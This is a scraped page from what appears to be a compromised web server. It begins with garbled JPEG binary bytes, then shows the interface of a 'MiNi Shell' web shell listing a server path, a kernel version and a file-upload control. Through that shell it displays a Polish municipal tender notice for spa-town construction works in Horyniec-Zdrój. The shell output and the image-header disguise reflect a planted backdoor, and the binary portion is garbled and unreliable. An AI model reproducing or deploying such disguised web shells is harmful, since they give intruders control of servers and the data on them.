JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20180717/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20180717/589811-N-2018.html

 <script type="text/javascript">//<![CDATA[//]]></script> <div> <style type="text/css"> .divRow_xforms { float: left; width: 100%; font-weight: normal; line-height: 30px; } .headerLarge_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: larger} .headerMedium_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: medium} .headerSmall_xforms { font-weight: bold; font-size: x-small;} .table_xforms { border-collapse: collapse; width: 900px; font-weight: normal} .table_xforms td { border: 2px solid black; border-collapse: collapse; padding: 5px;} .table_xforms th { border: 2px solid black; border-collapse: collapse; padding: 5px; font-weight: bold} @media print { .no-print, .no-print * { display: none !important; } } </style> <br /> <br /> <span id="ctl00_ContentPlaceHolder1_lblNumerOgloszenia">Ogłoszenie nr 589811-N-2018 z dnia 2018-07-17 r. </span> <br /> <br /> <div class="divRow_xforms"> <div class="headerMedium_xforms" style="text-align: center"> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc_h">Gmina Horyniec-Zdrój</span>: <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu_h">Rozbudowę i wyposażenie ogólnodostępnej infrastruktury uzdrowiskowej na terenie uzdrowiska Horyniec-Zdrój</span><br/> OGŁOSZENIE O ZAMÓWIENIU - <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia_h">Roboty budowlane</span> </div> <div> <b>Zamieszczanie ogłoszenia:</b> <span id="ctl00_ContentPlaceHolder1_zamieszczanie_obowiazkowe">Zamieszczanie obowiązkowe</span> </div> <div> <b>Ogłoszenie dotyczy:</b> <span id="ctl00_ContentPlaceHolder1_ogloszenie_dotyczy">Zamówienia publicznego</span> </div> <div> <b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_finansowane_z_unii">Tak</span> </div> <br/> <b>Nazwa projektu lub programu</b> <br/> <span id="ctl00_ContentPlaceHolder1_nazwa_projektu_programu">Regionalny Program Operacyjny Województwa Podkarpackiego 2014-2020 projek nr RPPK.06.01.00-18-0009/17-00 pn.: Rozbudowa i wyposażenie ogólnodostępnej infrastruktury uzdrowiskowej na terenie uzdrowiska Horyniec-Zdrój</span> </div> <div> <b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_ubiegac_zaklady_pracy">Nie</span> </div> <br/> Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %) <br/> <span id="ctl00_ContentPlaceHolder1_minimalny_procent_zatrudnienia"></span> </div> <div class="headerLarge_xforms" style="text-align: left"> <u>SEKCJA I: ZAMAWIAJĄCY</u> </div> <div style="padding-left: 20px"> <b>Postępowanie przeprowadza centralny zamawiający </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_centralny_zamawiajacy">Nie</span> </div> <b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_podmiot_zamawiajacy_powierzyl">Nie</span> </div> <b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_powierzyl"></span> <br/> <b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_wspolnie">Nie</span> </div> <br/> Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów: <br/> <br/> <b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_zamawiajacy_z_eu">Nie</span> </div> <b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej - mające zastosowanie krajowe prawo zamówień publicznych:</b> <span id="ctl00_ContentPlaceHolder1_postepowanie_wspolne_tresc"></span> <br/> <b>Informacje dodatkowe:</b> <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_zamawiajacy"></span> <br/> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>I. 1) NAZWA I ADRES: </b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_nazwa">Gmina Horyniec-Zdrój</span>, krajowy numer identyfikacyjny <span id="ctl00_ContentPlaceHolder1_regon">65090067700000</span>, ul. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_ulica">Al. Przyjaźni</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_domu">5</span> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_mieszkania"></span> , <span id="ctl00_ContentPlaceHolder1_zamawiajacy_kod_pocztowy">37620 </span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc">Horyniec-Zdrój</span>, woj. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_wojewodztwo">podkarpackie</span>, państwo <span id="ctl00_ContentPlaceHolder1_zamawiajacy_panstwo">Polska</span>, tel. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_telefon">166 313 455</span>, e-mail <span id="ctl00_ContentPlaceHolder1_zamawiajacy_email">ug@horyniec-zdroj.pl</span>, faks <span id="ctl00_ContentPlaceHolder1_zamawiajacy_fax">166 313 455</span>. <br/> Adres strony internetowej (URL): <span id="ctl00_ContentPlaceHolder1_adres_strony_url">www.horyniec-zdroj.pl</span> <br/> Adres profilu nabywcy: <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej">nie dotyczy</span> <br/> Adres strony internetowej pod którym można uzyskać dostęp do narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej_narzedzia">nie dotyczy</span> </div> <div style="text-align: left"> <b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego">Administracja samorządowa</span> <br /> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego_inny"></span> </div> <div style="text-align: left"> <b> I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>: </b> <div style="padding-left: 20px"> Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających): <br/> <span id="ctl00_ContentPlaceHolder1_wspolne_udzielanie_zamowienia">nie dotyczy</span> </div> </div> <div style="text-align: left"> <b> I.4) KOMUNIKACJA: </b> <br/> <b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_dokumentow_zamowienia">Tak</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_dokumentow_zamowienia">www.horyniec-zdroj.pl</span> </div> <br/> <b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_zamieszczona_bedzie_specyfikacja">Tak</span> <br/> <span id="ctl00_ContentPlaceHolder1_zamieszczona_bedzie_specyfikacja">www.horyniec-zdroj.pl</span> </div> <br/> <b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_do_dokumentow_ograniczony">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_do_dokumentow_ograniczony"></span> </div> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b> <br/> <b>Elektronicznie</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_oferty_wnioski_dostepne">Nie</span> <br/> adres <br/> <span id="ctl00_ContentPlaceHolder1_oferty_wnioski_dostepne"></span> </div> <br/> <div style="padding-left: 20px"> <b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszczone_wymagane_przeslanie_ofert">Nie</span> <br/> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_inny"></span> <br/> <b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_wymagane_przeslanie_ofert">Tak</span> <br /> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_wymagane_przeslanie_ofert_inny">pisemnie</span> <br/> Adres: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_adres">Urząd Gminy w Horyńcu-Zdroju, Aleja Przyjaźni 5, 37-620 Horyniec-Zdrój</span> </div> <br/> <b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_komunikacja_elektroniczna_wymaga">Nie</span> <br/> Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL) <br/> <span id="ctl00_ContentPlaceHolder1_komunikacja_elektroniczna_wymaga"></span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA II: PRZEDMIOT ZAMÓWIENIA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br/> <b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b> <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu">Rozbudowę i wyposażenie ogólnodostępnej infrastruktury uzdrowiskowej na terenie uzdrowiska Horyniec-Zdrój</span> <br/> <b>Numer referencyjny: </b> <span id="ctl00_ContentPlaceHolder1_numer_referencyjny">ZP.271.02.18</span> <br/> <b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b> <br/> <div style="padding-left: 20px; text-align: justify"> <span id="ctl00_ContentPlaceHolder1_czy_dialog_techniczny">Nie</span> </div> <br/> <b>II.2) Rodzaj zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia">Roboty budowlane</span> <br/> <b>II.3) Informacja o możliwości składania ofert częściowych</b> <br/> Zamówienie podzielone jest na części: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_podzielone_na_czesci">Tak</span> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b> <br/> <span id="ctl00_ContentPlaceHolder1_oferty_lub_wnioski">wszystkich części</span> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci"></span> <br/> </div> <b>Zamawiający zastrzega sobie prawo do udzielenia łącznie następujących części lub grup części:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zastrzega_prawo_grup_czesci"></span> <br/> <b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b> <br/> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci_jednemu_wykonawcy">3</span> <br/> <br/> <br/> <b> II.4) Krótki opis przedmiotu zamówienia </b> <i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane: </b> <span id="ctl00_ContentPlaceHolder1_okreslenie_przedmiotu">Część I Budowa traktu turystyczno-spacerowego w dzielnicy uzdrowiskowej.1.	Stan istniejący:Ciąg pieszy turystyczno spacerowy projektuje się na terenie działek o numerach ewid. 218/16, 226/48, 226/5, 226/7, 474/1, które zlokalizowane są w miejscowości Horyniec-Zdrój na terenie równinnym, niezabudowanym, naturalnie ukształtowanym. Działki przeznaczone pod planowaną inwestycję stanowią gruntu klasy IVa i IVb sklasyfikowane jako gleby orne średniej jakości i gorszej. Obecnie porośnięte są trawami.2. Projektowane zmiany zagospodarowania terenuCiąg pieszy turystyczno - spacerowy projektuje się na działkach o nr ewid. 218/16, 226/48, 226/5, 226/7 z włączeniem do działki o nr ewid. 474/1 (droga powiatowa).Projektuje się n.w. elementy ciągu pieszego:1.	Odcinka drogi wewnętrznej i chodnika z kostki brukowej oraz parkingu z płyt ażurowych przy drodze wewnętrznej, chodnika z kostki brukowej przy drodze wewnętrznej o powierzchni F=1.227,15 m22.	Ciągu pieszego turystyczno - spacerowego z chodnikiem z kostki granitowej oraz ścieku przy ścieżce przyrodniczo - edukacyjnej i chodniku. Powierzchnia zabudowy F=2.163,35 m23.	Ciągu pieszego turystyczno - spacerowego z chodnikiem z kostki granitowej i płyt granitowych ze ściekiem. Powierzchnia zabudowy: F=11.126,51 m24.	Utwardzenia części działki z kostki granitowej: Powierzchnia F=2115,80 m25.	Kontener sanitarny. Powierzchnia zabudowy: F=15,00 m26.	Tężnie solankowe 2 szt z terenem utwardzonym przy tężniach.: Powierzchnia zabudowy fundamentów F= 52,80 m27.	Altany parkowe - szt.2 - pow zabudowy - 19,20 m28.	Wiaty wypoczynkowe - szt.2 - pow zabudowy - 24,00 m29.	Utwardzenie terenu - dojścia do altan i wiat - pow zabudowy - 78,80 m210.	Poidełka wody mineralnej siarczkowej - 2 szt11.	Przyłącz wody mineralnej siarczkowej zasilający projektowane poidełka wody P1 i P2 12.	z rur PE?40x2,4; długość L=399,40 m.13.	Przyłącza kanalizacyjne odprowadzające wody mineralne siarczkowe z przelewu projektowanych poidełek wody P1 i P2 z rur PVC?160x4,0; długość L=4,70 m i L=4,40 m. 14.	Zbiorniki bezodpływowe PE o pojemności V=2,0 m315.	Studzienki betonowe ?1000 z zaworami spustowymi - 2 szt.16.	Część mokrej fontanny posadzkowej. Powierzchnia zabudowy: F=64,00 m217.	Włazy do podziemnej części technicznej fontanny posadzkowej. Powierzchnia zabudowy: F= 1,80 m218.	Mur wykonany z kamienia pod tablice informacyjne na ścieżce przyrodniczo - edukacyjnej 6 szt. Powierzchnia zabudowy: F= 5,40 m219.	Fundamenty pod słupy lamp oświetlenia terenu 69 szt. Powierzchnia zabudowy: F =6,20 m220.	Postumenty betonowe pod szafki elektryczne 3 szt. Powierzchnia zabudowy: F= 0,50 m2Elementy małej architektury na terenie zielonym: 1)	Powierzchnia zabudowy sofami pojedynczymi gabionowymi 70 szt.: F= 108,50 m22)	Powierzchnia zabudowy pod kwietniki 4-kątne gabionowe 2 szt. + 1szt ławka gabionowa - 20 szt.: F= 42,00 m2 Elementy uzbrojenia terenu na terenie zielonym:?	Właz żeliwny studzienki inspekcyjnej kanalizacji sanitarnej ?425 - szt. 30 ?	Właz żeliwny studzienki inspekcyjnej odwodnienia ciągu pieszego ?425 - szt. 29 3)	Właz żeliwny ?600 do studzienki wodomierzowej szt. 24)	Hydranty 6 szt. i skrzynki żeliwne zasuwObiekty budowlane zlokalizowane na utwardzonej części działki:1)	Wpust żeliwny na studzience osadnikowej ?425 - szt. 252)	Wpust żeliwny na studzience osadnikowej z rurą wznośną PVC ?425 - szt, 28; F=7,00m23)	Właz ?600 zbiorników solanki - szt. 2 4)	Właz studzienki technicznej przy tężniach solnych: F=0,40m213. Elementy małej architektury projektowane na ciągu pieszym, utwardzeniu części działki kostką granitową i chodniku z kostki brukowej i granitoweja)	kwietnik 12-kątny gabionowy - 1 sztb)	ławka gabionowa wokół kwietnika - 1 sztc)	kwietnik 4-kątny gabionowe 2 szt + 1 szt ławka gabionowa - 20 sztd)	kwietnik 6-kątny gabionowy 3 szt + 2 szt ławki gabionowe - 6 szte)	kwietnik 6-kątny gabionowe 2 szt + 1 szt ławka gabionowa - 3 sztf)	ławka - konstrukcja ze stali nierdzewnej satynowej, siedzisko z dębowych elementów drewnianych - 51 sztg)	ławka z oparciem - konstrukcja ze stali nierdzewnej satynowej, siedzisko z dębowych elementów drewnianych - 18 szth)	kosz -konstrukcja ze stali nierdzewnej satynowej, dębowe elementy drewniane pojemnik - 73szti)	donica - konstrukcja ze stali nierdzewnej satynowej, dębowe elementy drewniane - 39 sztj)	podłogowa zewnętrzna lampa wpuszczana led na terenie utwardzonym kostką granitową -30 szt14. Urządzenia siłowni plenerowej na utwardzonej części działki z kostki granitowejbiegacz z pylonem 2-stanowiskowyławka pozioma z pylonem 1-stanowiskowaduże koło obrotowe z pylonem 1-stanowiskowewyciskanie w pozycji siedzącej z pylonem 1-stanowiskoweorbitek z pylonem 1-stanowiskowyexpander z pylonem 1-stanowiskowyPrzłączaWodociąg Likwidacja odcinka wodociągu wo110-długość L=58,00 mproj. PE?110; długość L=56,80 mproj. PE?90; długość L=574,50 mproj. PE?40; długość L=197,10 mproj. PE?32; długość L=20,30 m Razem L= 848,70m Kanalizacja sanitarna1.	proj. PVC?200; długość L=819,50 mo	proj. PVC?160; długość L=35,70 m Razem L=855,20mKanalizacja odwodnienia ciągu pieszego?	proj. PVC?400; długość L=417,80 m?	proj. PVC?315; długość L=379,70 m?	proj. PVC?250; długość L=116,70 m?	proj. PVC?160; długość L=70,20 m Razem L= 984,40mPrzyłącza wodociągowy	PE?32x2,0; L=64,20 mPrzyłacz kanalizacji sanitarnej PVC?160x4,0; L=23,60 mPrzyłącz kanalizacji deszczowej PVC?160x4,0; L=5,70 mBilans działek Ciąg pieszy turystyczno - spacerowyDziałka nr ewid.: 218/16, powierzchnia: F= 3569 m2,Działka nr ewid.: 226/48, powierzchnia: F=30858 m2 Działka nr ewid.: 226/5, powierzchnia: F=3364 m2 Działka nr ewid.: 226/7, powierzchnia: F=3225 m2	Łącznie powierzchnia działek: F= 41.016,00 m24. Oddziaływanie górnicze Działki o nr ewid. 218/16, 226/48, 226/5, 226/7, 474/1 nie są położone na terenie górniczym.5. Warunki dziedzictwa kulturowego i zabytków oraz dóbr kulturyTeren, na którym projektowane są w.w. obiekty nie są wpisane do rejestru zabytków oraz nie są położone w strefie ochrony dziedzictwa kulturowego i zabytków oraz dóbr kultury współczesnej.Planowana inwestycja znajduje się na obszarze Natura 2000 Dyrektywa Ptasia PLB060012 Roztocze, Południoworoztoczańskim Parku Krajobrazowym i w strefie A ochrony uzdrowiskowej.Część II Budowa Centrum Informacji Turystycznej.1. Stan istniejącyNa działkach o nr ewid. 474/2 i 1138/1 wykonane są fundamenty betonowe w kształcie ośmiokąta.2. Projektowane zmiany zagospodarowania terenuBudynek Centrum Informacji Turystycznej projektuje się na istniejących fundamentach zlokalizowanych na działkach o nr ewid. 474/2 i 1138/1. Jest to budynek murowany z dachem konstrukcji drewnianej pokryty blachodachówką w kolorze istniejącego pokrycia zadaszonego wejścia do tunelu. Powierzchnia zabudowy budynkiem wynosi 44,30 m2Przyłącz wodociągowyNa działkach o nr ewid. 901/1 i 474/2 zaprojektowano przyłącz wodociągowy z rur PE?32x2,0; długość L=64,20 m. Przyłącz kanalizacji sanitarnejNa działkach o nr ewid. 901/1, 474/1, 474/2 zaprojektowano przyłącz kanalizacji sanitarnej z rur PVC?160x4,0; długość L=23,70 m. Przyłącz kanalizacji sanitarnej zaprojektowano włączyć do istniejącej studzienki kanalizacyjnej o rzędnej włazu 254,79 m n.p.m. i rzędnej dna 252,41 m n.p.m., oznaczonejw części graficznej S1 na działce o nr ewid. 901/1.Przyłącz kanalizacji deszczowejNa działce o nr ewid. 474/1, 474/2 i 1138/1 zaprojektowano przyłącz kanalizacji deszczowej z rur PVC-U, klasy N (SDR 41, SN4)o średnicy PVC?160x4,0; długość L=5,70 m. Przyłącz kanalizacji deszczowej zaprojektowano włączyć do istniejącej studzienki kanalizacyjnej o rzędnej włazu 255,20 m n.p.m. i rzędnej dna 252,85 m n.p.m., oznaczonejw części graficznej D1.Bilans działek Centrum Informacji TurystycznejDziałka nr ewid. 474/2 powierzchnia: F= 85 m2Działka nr ewid. 1138/1 powierzchnia: F=207 m2 Część III - Uzupełnienie infrastruktury w zabytkowym Parku Zdrojowym1. Stan istniejącyW stanie istniejącym:-	Konstrukcja kładki stalowa. Dylina oraz słupki i wypełnienie barierek drewniane. Elementy drewniane kładki zniszczone. Nie nadają się do dalszego użytkowania.-	Istniejący plac zabaw o nawierzchni z gruntu rodzimego obsiany trawą. Na terenie placu zabaw zainstalowane są nowe urządzenia.2. Projektowane zmiany zagospodarowania terenu Projektuje się:2.1.	przebudowę kładki nad potokiem Papiernia -powierzchnia zabudowy - 19,62 m22.2.	ścieżkę zdrowia od strony północnej wzdłuż urządzonej alejki spacerowej biegnącej równolegle do potoku Papiernia. Powierzchnia utwardzenia pod montaż urządzeń ogółem: 226,75 m22.3.	budowę nawierzchni bezpiecznej na istniejącym placu zabaw - powierzchnia zabudowy 460,00 m23. Wymagania dotyczące osób trzecich Sposób zagospodarowania działek nie naruszy interesów osób trzecich. Nie powoduje ograniczenia dostępu do drogi publicznej, nie pozbawia możliwości korzystania z wody, kanalizacji sanitarnej, gazu i energii elektrycznej, cieplnej, środków łączności. Inwestycja ta nie pozbawia dopływu światła dziennego do pomieszczeń przeznaczonych na stały pobyt ludzi, jest nie uciążliwa i nie powoduje zanieczyszczenia powietrza wody i gleby.4. Oddziaływanie górnicze Działki o nr ewid. 1359/2, 1740/1,1861/1 nie są położone na terenie górniczym.5. Warunki ochrony dziedzictwa kulturowego i zabytków oraz dóbr kultury współczesnejPark Zdrojowy w Horyńcu-Zdroju wpisany jest do rejestru zabytków pod Nr rej.A-548 z dnia 08.04.1993 powstał w 1920 r.</span> <br/> <br/> <b>II.5) Główny kod CPV: </b> <span id="ctl00_ContentPlaceHolder1_cpv_glowny_przedmiot">45200000-9</span> <br/> <b> Dodatkowe kody CPV:</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kod CPV</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45316110-9</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45233222-1</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45212140-9</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45330000-9</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45233161-5</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45000000-7</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45211350-7</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45112723-9</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45233200-1</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45221113-7</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45212140-9</TD></TR></TABLE> <br /> <br /> <b> II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>: <br/> Wartość bez VAT: <span id="ctl00_ContentPlaceHolder1_szacunkowa_wartosc_zamowienia_calosc"></span> 